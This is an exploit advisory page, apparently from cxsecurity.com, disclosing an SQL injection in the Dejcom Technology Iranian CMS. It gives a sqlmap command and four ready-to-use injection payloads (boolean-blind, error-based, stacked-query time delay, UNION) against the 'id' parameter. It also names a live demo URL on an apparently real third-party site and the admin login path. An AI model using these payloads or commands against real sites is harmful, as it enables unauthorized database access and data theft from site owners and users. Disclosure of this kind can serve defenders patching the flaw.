Dejcom Technology IRANIAN CMS SQL injection

2019.11.04
ie S I R M A X (IE) ie
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# # Exploit Title: Dejcom Technology IRANIAN CMS SQL injection # Date: 2019-10-31 # Exploit Author: S I R M A X # Vendor Homepage: http://dejcom.ir/ # Version: All Version # Tested on: win,linux ================================================================================= [SQL injection] [+] Method ( Sql injection ) Storm Security Team of IRan [+] parameter : ID == php?ID= ================================================================================= [+] Sqlmap: [-] sqlmap -u http://Target.com/content.aspx?id= --dbs [#] Testing Method: [+] - boolean-based blind [+] - error-based [+] - stacked queries [+] - UNION query -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ||||||||||||||||||||||| Parameter: id (GET) || ||||||||||||||||||||||| Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=29' AND 3020=3020 AND 'MWXM'='MWXM -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) Payload: id=29' AND 4451 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4451=4451) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113))) AND 'Toqj'='Toqj -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=29';WAITFOR DELAY '0:0:5'-- -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=-1841' UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(85)+CHAR(75)+CHAR(80)+CHAR(119)+CHAR(66)+CHAR(98)+CHAR(79)+CHAR(113)+CHAR(105)+CHAR(90)+CHAR(112)+CHAR(80)+CHAR(76)+CHAR(99)+CHAR(71)+CHAR(120)+CHAR(73)+CHAR(89)+CHAR(121)+CHAR(98)+CHAR(89)+CHAR(65)+CHAR(110)+CHAR(67)+CHAR(102)+CHAR(81)+CHAR(78)+CHAR(100)+CHAR(103)+CHAR(79)+CHAR(65)+CHAR(73)+CHAR(68)+CHAR(85)+CHAR(78)+CHAR(81)+CHAR(70)+CHAR(76)+CHAR(71)+CHAR(105)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113),NULL,NULL-- Cdmy -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ================================================================================= Demo: [+] http://nozhanco.net/content.aspx?id=[SQL] ================================================================================= admin panel => Target.com/panel/login.aspx ================================================================================= [=] T.me/Sir_Max [=] Telegram Channel ==> @Storm_Security #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top